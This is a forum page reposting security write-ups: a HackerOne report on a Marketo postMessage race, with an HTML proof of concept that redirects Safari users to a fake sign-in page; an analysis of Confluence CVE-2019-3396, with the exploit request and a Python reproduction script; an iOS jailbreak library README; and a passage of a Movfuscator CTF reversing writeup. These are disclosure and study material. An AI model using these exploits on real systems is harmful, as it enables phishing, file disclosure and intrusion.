Everything posted by Nytro

  1. Client-Side Race Condition using Marketo, allows sending user to data-protocol in Safari when form without onSuccess is submitted on www.hackerone.com

fransrosen submitted a report to HackerOne. Jul 14th (9 months ago)

Hi, I made a talk earlier this month about Client-Side Race Conditions for postMessage at AppSecEU: https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies In this talk I mention some fun ways to race postMessages from a malicious origin before the legit source sends them.

Background

As you remember from #207042, you use Marketo for your form submissions on www.hackerone.com. Back then, I abused the fact that no origin was checked on the receiving end of marketo.com. By doing this I was able to steal the data being submitted.

Technical Description

In this case however, I noticed that as soon as you submit a form, one of the listeners on www.hackerone.com will pass the content forward to a handler for the specific form that was loaded. As soon as it finds the form that was initiated and submitted, it will run either the error or the success function based on the content of the postMessage. If the message is a success, it will run any form.onSuccess defined when the form was loaded. You can see some of these in this file: https://www.hackerone.com/sites/default/files/js/js_pdV-E7sfuhFWSyRH44H1WwxQ_J7NeE2bU6XNDJ8w1ak.js

form.onSuccess(function() { return false; });

If the onSuccess returns false, nothing more will happen. However, if the onSuccess doesn't exist or returns true, the parameter called followUpUrl will instead be sent to location.href. There is no check whatsoever on what this URL contains. The code does parse the URL, and if a parameter called aliId is set it will append it to the URL.

As you might know, the flow of the Marketo solution looks like this:

1. Form is initiated by loading a JS-file from Marketo.
2. Form shows up on www.hackerone.com
3. Form is submitted. Listener is now initiated on www.hackerone.com
4. Message is sent to Marketo from www.hackerone.com using postMessage
5. Marketo gets the message and runs an ajax call to save it on Marketo
6. When successful, a postMessage is sent from Marketo back to www.hackerone.com with the status.
7. The listener catches the response and checks onSuccess.
8. If onSuccess gives false, don't do anything.
9. If it doesn't exist or returns true, follow the followUpUrl.

Exploitation

Since no origin check is made on the listener initiated in #3, we can from our end try to race the message between #3 and #6. If our message comes through, we can direct the user to whatever location we like if we find a form that doesn't utilize onSuccess.

Forms on www.hackerone.com

Looking at the forms, we can see that one being initiated, called mktoForm_1013, does not have any onSuccess-function on it. This means that we can now use the followUpUrl from the postMessage to send the user to our location. We can also see in your JS-code above that the following URLs contain mktoForm_1013:

if (location.pathname == "/product/response") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to get up and running with HackerOne Response? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/bounty") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to tap into the ultimate level of hacker-powered security with HackerOne Bounty? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/challenge") { $('#mktoForm_1013 .mktoHtmlText p').text('Up for a HackerOne Challenge? Want to learn more? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/services") { $('#mktoForm_1013 .mktoHtmlText p').text("We're looking forward to serving you. Give us a few details and we’ll be in touch shortly!"); } else if (location.pathname == "/") { $('#mktoForm_1013 .mktoHtmlText p').text("Start uncovering critical vulnerabilities today. Give us a few details and we’ll be in touch shortly!"); }

And as before in the old report, we know that #contact as the fragment will open the form directly without interaction.

CSP

Due to your CSP, we cannot send the user to javascript:. If your CSP had allowed it, we would have a proper XSS on www.hackerone.com. Chrome and Firefox also disallow sending the user to a data:-URL. We can send the user to any location we like, but that's no fun. ...but... ...enter Safari. Safari does not restrict top-navigation to data: (tested in macOS 10.13.5, Safari 11.1.1). This means that we can do the following:

1. Have a malicious page opening https://www.hackerone.com/product/response#contact
2. Make it send a bunch of messages saying the form was successfully submitted.
3. When the victim fills in the form and submits, our message will hopefully win, since Marketo needs to both get the postMessage and send an ajax call to save the response before it can send a legit response.
4. We redirect the user to a very good-looking sign-in page for HackerOne.
5. ???
6. PROFIT!!!

PoC

When trying this attack I noticed that if Safari opens www.hackerone.com in a new tab instead of a new window, Safari counts the tab as inactive and will slow down the sending of postMessages to the current frame. However, if you open www.hackerone.com in a completely new window, using window.open(url,'','_blank'), Safari will not count the old window as inactive and the messages will be sent just as fast, which will significantly increase our chance of winning the race.
The following HTML should show you my PoC in Safari: <html> <head> <script> var b; function doit() { setInterval(function() { b.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"data:text/html;base64,PGhlYWQ+PGxpbmsgcmVsPXN0eWxlc2hlZXQgbWVkaWE9YWxsIGhyZWY9aHR0cHM6Ly9oYWNrZXJvbmUuY29tL2Fzc2V0cy9mcm9udGVuZC4wMjAwMjhlOTU1YTg5Zjg1YTVmYzUyMWVhYzMxMDM2OC5jc3MgLz48bGluayByZWw9c3R5bGVzaGVldCBtZWRpYT1hbGwgaHJlZj1odHRwczovL2hhY2tlcm9uZS5jb20vYXNzZXRzL3ZlbmRvci1iZmRlMjkzYTUwOTEzYTA5NWQ4Y2RlOTcwZWE1YzFlNGEzNTI0M2NjNzY3NWI2Mjg2YTJmM2Y3MDI2ZmY1ZTEwLmNzcz48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0iYWxlcnRzIj4KPC9kaXY+PGRpdiBjbGFzcz0ianMtYXBwbGljYXRpb24tcm9vdCBmdWxsLXNpemUiPjxzcGFuIGRhdGEtcmVhY3Ryb290PSIiPjxkaXYgY2xhc3M9ImZ1bGwtc2l6ZSBhcHBsaWNhdGlvbl9mdWxsX3dpZHRoX2xheW91dCI+PGRpdj48ZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zaWduZWQtb3V0Ij48ZGl2IGNsYXNzPSJpbm5lci1jb250YWluZXIiPjxkaXY+PGEgY2xhc3M9ImFwcF9fbG9nbyIgaHJlZj0iLyI+PGltZyBzcmM9Imh0dHBzOi8vaGFja2Vyb25lLmNvbS9hc3NldHMvc3RhdGljL2ludmVydGVkX2xvZ28tYzA0MzBhZjgucG5nIiBhbHQ9IkhhY2tlck9uZSI+PC9hPjxkaXYgY2xhc3M9InRvcGJhci10b2dnbGUiPjxpIGNsYXNzPSJpY29uLWhhbWJ1cmdlciI+PC9pPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWJuYXYtd3JhcHBlciI+PHVsIGNsYXNzPSJ0b3BiYXItc3VibmF2Ij48bGkgY2xhc3M9InRvcGJhci1zdWJuYXYtaXRlbSI+PGEgY2xhc3M9InRvcGJhci1zdWJuYXYtbGluayIgaHJlZj0iL3VzZXJzL3NpZ25faW4iPlNpZ24gSW48L2E+Jm5ic3A7fCZuYnNwOzwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItc3VibmF2LWl0ZW0iPjxhIGNsYXNzPSJ0b3BiYXItc3VibmF2LWxpbmsiIGhyZWY9Ii91c2Vycy9zaWduX3VwIj5TaWduIFVwPC9hPjwvbGk+PC91bD48L2Rpdj48ZGl2IGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi13cmFwcGVyIj48dWwgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uIj48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIj5Gb3IgQnVzaW5lc3M8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Rm9yIEhhY2tlcnM8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayIgaHJlZj0iL2hhY2t0aXZpdHkiPkhhY2t0aXZpdHk8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Q29tcGFueTwvYT48L3NwYW4+PC9saT48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIiBocmVmPSIvdXNlcnMvc2lnbl9pbiI+VHJ5IEhhY2tlck9uZTwvYT48L3NwYW4+PC9saT48L3VsPjwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWIiPjwvZGl2PjwvZGl2PjxzcGFuPjwvc3Bhbj48L2Rpdj48ZGl2IGNsYXNzPSJmdWxsLXdpZHRoLWNvbnRhaW5lciIgc3R5bGU9InBhZGRpbmctdG9wOiAxNTBweDsiPjxkaXYgY2xhc3M9Im5hcnJvdy13cmFwcGVyIj48ZGl2Pjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJodHRwczovL2hhY2tlcm9uZS5jb20vdXNlcnMvc2lnbl9pbiIgb25zdWJtaXQ9ImFsZXJ0KCdpIGdvdCBpdDogJyArIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzaWduX2luX2VtYWlsJykudmFsdWUgKyAnOicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaW5wdXQtNCcpLnZhbHVlKTsgcmV0dXJuIGZhbHNlOyIgbm92YWxpZGF0ZT0iIiBjbGFzcz0ic3BlYy1zaWduLWluLWZvcm0iPjxkaXY+PGgxIGNsYXNzPSJzZWN0aW9uLXRpdGxlIHRleHQtYWxpZ25lZC1jZW50ZXIiPlNpZ24gaW4gdG8gSGFja2VyT25lPC9oMT48ZGl2IGNsYXNzPSJuYXJyb3ctY29udGFpbmVyIj48ZGl2IGNsYXNzPSJpbnB1dC13cmFwcGVyIj48bGFiZWwgY2xhc3M9ImlucHV0LWxhYmVsIiBmb3I9InNpZ25faW5fZW1haWwiPkVtYWlsIGFkZHJlc3M8L2xhYmVsPjxpbnB1dCB0eXBlPSJlbWFpbCIgY2xhc3M9ImlucHV0IHNwZWMtc2lnbi1pbi1lbWFpbCIgbmFtZT0idXNlcltlb
WFpbF0iIHZhbHVlPSIiIGlkPSJzaWduX2luX2VtYWlsIiBhdXRvY29tcGxldGU9Im9uIj48ZGl2IGNsYXNzPSJoZWxwZXItdGV4dCI+VXNpbmcgU0FNTD8gRW1haWwgYWRkcmVzcyBvbmx5LCBubyBwYXNzd29yZCBuZWVkZWQuPC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0iaW5wdXQtd3JhcHBlciI+PGxhYmVsIGNsYXNzPSJpbnB1dC1sYWJlbCIgZm9yPSJpbnB1dC00Ij5QYXNzd29yZDwvbGFiZWw+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBjbGFzcz0iaW5wdXQgc3BlYy1zaWduLWluLXBhc3N3b3JkIiBuYW1lPSJ1c2VyW3Bhc3N3b3JkXSIgdmFsdWU9IiIgaWQ9ImlucHV0LTQiIGF1dG9jb21wbGV0ZT0ib24iIG1heGxlbmd0aD0iNzIiPjwvZGl2PjxkaXYgY2xhc3M9ImlucHV0LXdyYXBwZXItc21hbGwiPjxkaXYgY2xhc3M9InJlbWVtYmVyLW1lIj48aW5wdXQgdHlwZT0iY2hlY2tib3giIGlkPSJ1c2VyX3JlbWVtYmVyX21lIiBuYW1lPSJ1c2VyW3JlbWVtYmVyX21lXSIgY2xhc3M9InNwZWMtc2lnbi1pbi1yZW1lbWJlci1tZSIgdmFsdWU9IjEiPjxsYWJlbCBmb3I9InVzZXJfcmVtZW1iZXJfbWUiPlJlbWVtYmVyIG1lIGZvciB0d28gd2Vla3M8L2xhYmVsPjwvZGl2PjxhIGhyZWY9Ii91c2Vycy9wYXNzd29yZC9uZXciIGNsYXNzPSJmb3Jnb3QtcGFzc3dvcmQiPkZvcmdvdCB5b3VyIHBhc3N3b3JkPzwvYT48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiBidXR0b24tLXN1Y2Nlc3MgaXMtZnVsbC13aWR0aCBzcGVjLXNpZ24taW4tc3VibWl0IiBuYW1lPSJjb21taXQiIHZhbHVlPSJTaWduIGluIj48L2Rpdj48ZGl2IGNsYXNzPSJuYXJyb3ctZm9vdGVyIj5ObyBhY2NvdW50IHlldD8gPGEgaHJlZj0iL3VzZXJzL3NpZ25fdXAiPkNyZWF0ZSBhbiBhY2NvdW50LjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PC9mb3JtPjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48L2Rpdj48bm9zY3JpcHQ+PGRpdiBjbGFzcz0ianMtZGlzYWJsZWQiPkl0IGxvb2tzIGxpa2UgeW91ciBKYXZhU2NyaXB0IGlzIGRpc2FibGVkLiBUbyB1c2UgSGFja2VyT25lLCBlbmFibGUgSmF2YVNjcmlwdCBpbiB5b3VyIGJyb3dzZXIgYW5kIHJlZnJlc2ggdGhpcyBwYWdlLjwvZGl2Pjwvbm9zY3JpcHQ+PC9ib2R5Pg==","aliId":null}}}','*'); console.log('send...') }, 10); } </script> </head> <body> <a href="#" onclick="b=window.open('https://www.hackerone.com/product/response#contact','b','_blank'); doit(); return false;" target="_blank">Click me and send something</a></body> </html> It's large, but it also contains your login page. 1. User clicks on the malicious page: 2. User fills in the contact form and submits 3. User gets directly redirected to our data-page 4. If they sign in we will steal the creds: PoC-movie Here's a movie showing the scenario: Impact I'm pretty divided on the impact of this. You could argue that this is similar to opening www.hackerone.com from a page, that will on a later time redirect the user to data:, which is fully possible and probably just as sneaky. The only difference would be that this could be properly fixed and the logic of the listener in this case actually enables the attacker to fool the user related to the interaction with the site. Also, most likely a lot of other customers of Marketo are affected by this and if they lack CSP, there will be XSS:es all over the place. Also, if IE11 would support those contact-popups, it would be an XSS due to the lack of CSP-support, however now I'm getting a JS-error trying to open the contact-form... Mitigation What's interesting here though is that you can actually mitigate this easily by making sure you always use onSuccess=function(){return false} to always make sure followUpUrl won't be used. Regards, Frans 5 attachments: F320358: malicious.png F320359: contact.png F320360: sign-in.png F320361: popup.png F320362: safari-location-data.mp4 Sursa: https://hackerone.com/reports/381356
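The followUpUrl in the PoC above is a data:text/html;base64 URL carrying the fake sign-in page. A quick way to inspect such a payload is to decode it offline; a minimal sketch in Python, assuming the PoC has been saved locally as poc.html (a hypothetical filename):

import base64
import re

# Pull the base64 body out of the data: URL embedded in the PoC and
# decode it to see the phishing page the victim would be shown.
with open("poc.html") as f:
    poc = f.read()

match = re.search(r"data:text/html;base64,([A-Za-z0-9+/=]+)", poc)
if match:
    html = base64.b64decode(match.group(1)).decode("utf-8")
    print(html)  # the cloned sign-in page, with its onsubmit alert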
  2. 【CVE-2019-3396】: SSTI and RCE in Confluence Server via Widget Connector

Posted 2019-04-06 | Category: Web Security | Views: 1141 | Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the documentation, there are three parameters that you can set to control the content or format of the macro output: URL, Width and Height. The Widget Connector has defined some renderers, for example the FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer { ... public String getEmbeddedHtml(String url, Map<String, String> params) { params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"); return this.velocityRenderService.render(getEmbedUrl(url), params); } }

In FriendFeedRenderer's getEmbeddedHtml function, you can see that they put another option, _template, into the params map. However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly. So in this situation we can supply the _template parameter ourselves, and the backend will use it to render the output.

Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

Patch

In the fixed version, doSanitizeParameters is called before rendering the HTML, which removes _template from the parameters. The code may look like this:

public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder { public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) { ... this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" })); } ... public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) { ... doSanitizeParameters(parameters); return this.renderManager.getEmbeddedHtml(url, parameters); } private void doSanitizeParameters(Map<String, String> parameters) { Objects.requireNonNull(parameters); for (String sanitizedParameter : this.sanitizeFields) { parameters.remove(sanitizedParameter); } } }

Source: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
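A minimal sketch of the reproduction step using Python's requests library, assuming a test instance at http://confluence.local:8090 and a valid contentId (both hypothetical; the payload itself is copied from the request above):

import requests

# Reproduces the preview request from the writeup: _template points
# outside the template directory (path traversal), so a vulnerable
# server renders ../web.xml back in the macro preview.
payload = {
    "contentId": "65601",
    "macro": {
        "name": "widget",
        "params": {
            "url": "https://www.viddler.com/v/test",
            "width": "1000",
            "height": "1000",
            "_template": "../web.xml",
        },
        "body": "",
    },
}

r = requests.post(
    "http://confluence.local:8090/rest/tinymce/1/macro/preview",
    json=payload,
    timeout=10,
)
print(r.status_code)
print(r.text[:500])  # a vulnerable instance leaks web.xml content here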
  3. jelbrekLib

Give me tfp0, I give you jelbrek. A library with commonly used patches from open-source jailbreaks. Call this a (light?) QiLin open-source alternative.

Compiling: ./make.sh

Setup

Compile, OR head over to https://github.com/jakeajames/jelbrekLib/tree/master/downloads and get everything there. Link with jelbrekLib.a & IOKit.tbd and include jelbrekLib.h. Call init_jelbrek() with tfp0 as your first thing and term_jelbrek() as your last.

Issues

The AMFID patch won't persist after the app enters the background. A fix would be using a daemon (like amfidebilitate) or injecting a dylib (iOS 11).

iOS 12 status: the rootFS remount is broken. There is hardening on snapshot_rename() which can and has been (privately) bypassed, but it for sure isn't as bad as last year with iOS 11.3.1, where they made major changes. The only thing we need is to figure out how they check whether the snapshot is the rootfs and not something in /var, for example, where snapshot_rename works fine. kexecute() is also probably broken on A12. Use bazad's PAC bypass, which offers the same thing, so this isn't an issue (for now). Getting root, unsandboxing, NVRAM lock/unlock, setHSP4(), trustbin(), entitlePid + task_for_pid() are all working fine. The rest that is not on top of my mind should also work fine.

Codesign bypass

Patching amfid should be a matter of getting task_for_pid() working. (Note: on A12 you need to take a completely different approach; bazad has proposed an amfid-patch-less amfid bypass here: https://github.com/bazad/blanket/tree/master/amfidupe, which will probably work, but don't take my word for it.) As for the payload dylib, you can just sign it with a legit cert and nobody will complain about the signature. As for unsigned binaries, you'll probably have to sign them with a legit cert as well, due to CoreTrust, or just add them to the trustcache.

Credits

  • theninjaprawn & xerub for patchfinding
  • xerub & the Electra team for trustcache injection
  • stek29 for nvramunlock & lock and the hsp4 patch
  • theninjaprawn & Ian Beer for dylib injection
  • Luca Todesco for the remount patch technique
  • Umang Raghuvanshi for the original remount idea
  • pwn20wnd for the implementation of the rename-APFS-snapshot technique
  • AMFID dylib-less patch technique by Ian Beer, reworked with the patch code from Electra's amfid_payload (stek29 & coolstar)
  • rootless-hsp4 idea by Ian Beer, implemented in his updated async_wake exploit
  • Sandbox exceptions by stek29 (https://stek29.rocks/2018/01/26/sandbox.html)
  • CSBlob patching with stuff from Jonathan Levin and xerub
  • Symbol finding by me (https://github.com/jakeajames/kernelSymbolFinder)

The rest of the patches are fairly simple and shouldn't be considered anyone's property, in my opinion; everyone with enough knowledge can write them fairly easily. And don't forget to tell me if I forgot to credit anyone!

Source: https://github.com/jakeajames/jelbrekLib
  4. Understanding the Movfuscator

14 MAR 2019 • 12 mins read

MoVfuscator is the PoC for the Turing completeness of the mov instruction. Yes, you guessed it right: it uses only movs, except in a few places. This makes reversing difficult, because the control flow is obfuscated. I'll be analyzing the challenge Mov of UTCTF'19 using IDA Free.

MoV

The Stack

Movfuscator uses its own stack. The stack consists of an array of addresses. [Figure: movfuscator stack layout] Each element of the stack is at an offset of 0x200064 from its stack address. The stack begins at 0x83f70e8 and grows from high to low addresses. The stack pointer is saved in the variable sesp. The variable NEW_STACK stores the address of guard.

mov esp, NEW_STACK ; address of guard
mov esp, [esp-0x200068] ; address of A[n-1]
mov esp, [esp-0x200068] ; address of A[n-2]
; ... ; n times ; ...
; use esp

So, mov esp, [esp-0x200068] subtracts 4 from esp. Now we can understand what start does.

mov dword [esp-4*4], SIGSEGV
mov dword [esp-4*4+4], offset sa_dispatch
mov dword [esp-4*4+8], 0
call sigaction
mov dword [esp-3*4], SIGILL
mov dword [esp-3*4+4], offset sa_loop
mov dword [esp-3*4+8], 0
call sigaction
; ; ... ;

.plt:08048210 public dispatch
.plt:08048210 dispatch proc near ; DATA XREF: .data:sa_dispatch↓o
.plt:08048210 mov esp, NEW_STACK
.plt:08048216 jmp function
.plt:08048216 dispatch endp

Movfuscator uses SIGSEGV to execute a function, and SIGILL to execute a JMP instruction which jumps to master_loop, because we can't mov to eip; that is invalid in x86. Execution is controlled using the on variable. This is a boolean variable that determines whether a statement will be executed or not. The master_loop sets the value of on and then disables toggle_execution. This is the structure of an if statement:

def logic_if(condition, dest, src)
    if (condition)
        dest = src
    else
        discard = src

It then adds 4 to sesp and stores the sum in stack_temp.

Push

The array sel_data contains two members - discard and data_p. This is a MUX which selects data_p if on is set. So, if on is set, eax contains the address of NEW_STACK. The value of esp-4 is stored in NEW_STACK, which is the stack pointer, and then the value of stack_temp is stored at the current stack pointer. The above set of instructions is equivalent to:

mov eax, [stack_temp]
sub esp, 4
mov [esp], eax

It can also be represented as:

push dword [stack_temp]

The sequence of instructions until 0x0804843C does the following:

mov eax, [sesp]
add eax, 4
push eax
push dword [sesp]
push 0x880484fe

It conditionally sets the value of target to branch_temp. The target variable is the destination of an unconditional jump. In this code, the target is set to 0x88048744. Let's see how jumps are implemented:

on = 1
...
target = jump_destination
; save registers R, F, D
on = 0
...
if (fetch_addr == target) {
    ; restore registers R, F, D
    on = 1
}
...

The above code saves the registers. It then checks if the fetch address equals the address contained in target. The equal-to comparison is computed for each byte, and the result is the logical AND of the four comparisons. The result of the comparison is stored in the boolean variable b0. Now if b0 is set, the registers are restored and the on variable is set. This is equivalent to the following if the on variable is set:

push 0
call _exit

You must be wondering how I deduced the call instruction. Here it is:

Function Call

Function calls are implemented using the SIGSEGV signal.
The array fault is defined like this .data:085F7198 fault dd offset no_fault ; DATA XREF: _start+51F↑r .data:085F719C dd 0 .data:085F71A0 no_fault dd 0 So, fault when indexed with on returns 0 if on is set, otherwise a valid address. This return value is dereferenced which results in a SIGSEGV (Segmentation Fault) if its zero. But since, the value of target is 0x88048744. The control jumps to main. In main, the registers are restored and the on flag is set. After that it pushes fp, R1, R2, R3, F1, dword_804e04c, D1 into the stack The function prologue It first assigns the frame pointer fp to the current stack pointer and allocates 37 dwords (148 bytes) from the stack. This is equivalent to the following x86 mov ebp, esp ; ebp is **fp** sub esp, 148 Computes fp-19*4 and stores the value of R3 into the address. So, this is basically mov R3, 0 mov [fp-19*4], R3 Great ! So, we have a dword at fp-0x4c initialized to 0. Then we have an array of bytes at fp-0x47 initialized as follows mov R0, 0x1a mov byte [fp-18*4], R0 mov R0, 0x19 mov byte [fp-0x47], R0 mov R0, 11 mov byte [fp-0x46], R0 mov R0, 0x31 mov byte [fp-0x45], R0 mov R0, 6 mov byte [fp-17*4], R0 mov R0, 4 mov byte [fp-0x43], R0 mov R0, 0x18 mov byte [fp-0x42], R0 mov R0, 0x10 mov byte [fp-0x41], R0 mov R0, 10 mov byte [fp-16*4], R0 mov R0, 0x33 mov byte [fp-0x3f], R0 mov R0, 0x19 mov byte [fp-0x3e], R0 mov R0, 10 mov byte [fp-0x3d], R0 mov R0, 0x33 mov byte [fp-15*4], R0 mov R0, 0 mov byte [fp-0x3b], R0 mov R0, 10 mov byte [fp-0x3a], R0 mov R0, 0x3c mov byte [fp-0x39], R0 mov R0, 0x19 mov byte [fp-14*4], R0 mov R0, 13 mov byte [fp-0x37], R0 mov R0, 6 mov byte [fp-0x36], R0 mov R0, 0x19 mov byte [fp-0x35], R0 mov R0, 0x3c mov byte [fp-13*4], R0 mov R0, 14 mov byte [fp-0x33], R0 mov R0, 0x10 mov byte [fp-0x32], R0 mov R0, 0x3c mov byte [fp-0x31], R0 mov R0, 0x10 mov byte [fp-12*4], R0 mov R0, 12 mov byte [fp-0x2f], R0 mov R0, 0x32 mov byte [fp-0x2e], R0 mov R0, 10 mov byte [fp-0x2d], R0 mov R0, 0x14 mov byte [fp-11*4], R0 mov R0, 13 mov byte [fp-0x2b], R0 mov R0, 6 mov byte [fp-0x2a], R0 mov R0, 0x19 mov byte [fp-0x29], R0 mov R0, 0x3c mov byte [fp-10*4], R0 mov R0, 0x19 mov byte [fp-0x27], R0 mov R0, 6 mov byte [fp-0x26], R0 mov R0, 0x33 mov byte [fp-0x25], R0 mov R0, 4 mov byte [fp-9*4], R0 mov R0, 10 mov byte [fp-0x23], R0 mov R0, 0x33 mov byte [fp-0x22], R0 mov R0, 0x19 mov byte [fp-0x21], R0 mov R0, 14 mov byte [fp-8*4], R0 mov R0, 6 mov byte [fp-0x1f], R0 mov R0, 0x31 mov byte [fp-0x1e], R0 mov R0, 0x31 mov byte [fp-0x1d], R0 mov R0, 0x1e mov byte [fp-7*4], R0 mov R0, 0x3c mov byte [fp-0x1b], R0 mov R0, 0x17 mov byte [fp-0x1a], R0 mov R0, 10 mov byte [fp-0x19], R0 mov R0, 0x31 mov byte [fp-6*4], R0 mov R0, 6 mov byte [fp-0x17], R0 mov R0, 0x19 mov byte [fp-0x16], R0 mov R0, 10 mov byte [fp-0x15], R0 mov R0, 9 mov byte [fp-5*4], R0 mov R0, 0x3c mov byte [fp-0x13], R0 mov R0, 0x19 mov byte [fp-0x12], R0 mov R0, 12 mov byte [fp-0x11], R0 mov R0, 0x3c mov byte [fp-4*4], R0 mov R0, 0x19 mov byte [fp-0xf], R0 mov R0, 13 mov byte [fp-0xe], R0 mov R0, 10 mov byte [fp-0xd], R0 mov R0, 0x3c mov byte [fp-3*4], R0 mov R0, 0 mov byte [fp-0xb], R0 mov R0, 13 mov byte [fp-0xa], R0 mov R0, 6 mov byte [fp-0x9], R0 mov R0, 0x31 mov byte [fp-2*4], R0 mov R0, 0x31 mov byte [fp-7], R0 mov R0, 10 mov byte [fp-6], R0 mov R0, 0x33 mov byte [fp-5], R0 mov R0, 4 mov byte [fp-4], R0 mov R0, 10 mov byte [fp-3], R0 mov R0, 2 mov byte [fp-2], R0 At 0x804ba9c, the int variable at fp-0x4c is set to 0. 
If target is 0x8804bb37, it executes the following:

if (target == 0x8804bb37) {
    ; restore the registers
    R{0,1,2,3} = jmp_r{0,1,2,3}
    F{0,1} = jmp_f{0,1}
    D{0,1} = jmp_d{0,1}
    dword_804e044 = dword_85f717c
    dword_804e04c = dword_85f7184
    ; set execution flag
    on = 1
}
mov R3, [fp-19*4]
if (on) {
    mov R3, [R3]
    mov R2, [fp-37*4]
    add R2, R3
    mov R1, [fp-18*4]
    add R3, R1
    mov R0, byte [R3]
    mov R3, R0
    xor R3, 0x53
    sub R3, 3
    xor R3, 0x33
    mov R0, R3
    mov [R2], R0
}

Since target contains 0x88048744, which is not 0x8804bb37, none of the instructions in the if enclosed by on is executed. At 0x0804C2D4, we have another branch check:

if (target == 0x8804C2D4) {
    RESTORE_REGS()
    on = 1
}
mov R3, [fp-19*4]
if (on) {
    add R3, 1
    mov [fp-19*4], R3
    mov R3, [fp-19*4]
    setc
    sbb R3, 0x47
    mov branch_temp, 0x8804bb37
}

alu_false contains 1 at index 0, and 0 at the remaining indices. So this sets the complement of the carry flag. The zero flag is evaluated as NOR logic, i.e., ZF = !(alu_s[0] | alu_s[1] | alu_s[2] | alu_s[3]). alu_b7 is an array of 256 dwords; the first 128 are zero, and the rest are 1. Indexing into this array determines the sign bit (bit 7) of the index. Okay, so alu_cmp_of represents a truth table. Of what? Well, there are only two out of the eight minterms set, so we get the following SOP: x'ys + xy's', where x, y, s are the sign bits of alu_x, alu_y, alu_z. Cool! This is the overflow flag.

It XORs the sign flag and the overflow flag and sets target to branch_temp, which is 0x8804bb37. By XORing the sign and overflow flags we get the less-than flag. So, if R3 is less than 0x47, the target is set to 0x8804bb37. Then we have the following:

mov byte [fp-0x4d], 0
if (target == 0x8804CA3B) {
    on = 1
}
if (on) {
    mov esp, fp
    mov D1, [esp]
    mov dword_804e04c, [esp+4]
    sub esp, 4*2
    mov eax, [esp]
    sub esp, 4
    mov F1, eax
    mov eax, [esp]
    sub esp, 4
    mov R3, eax
    mov eax, [esp]
    sub esp, 4
    mov R2, eax
    mov eax, [esp]
    sub esp, 4
    mov R1, eax
    mov eax, [esp]
    sub esp, 4
    mov fp, eax
    mov eax, [esp]
    sub esp, 4
    mov branch_temp, eax
    mov target, branch_temp
    on = 0
}

A SIGILL is executed, which causes control to jump to the master loop, and the execution of instructions is skipped until control reaches 0x804bb37. So, this is basically a while loop. Wow!! The control first compares R3 with 0x47 and branches to 0x804bb37 while R3 is less than 0x47. When the condition becomes false, it executes from 0x804ca3b.

Algorithm

So, the logic is:

int main() {
    int i = 0;
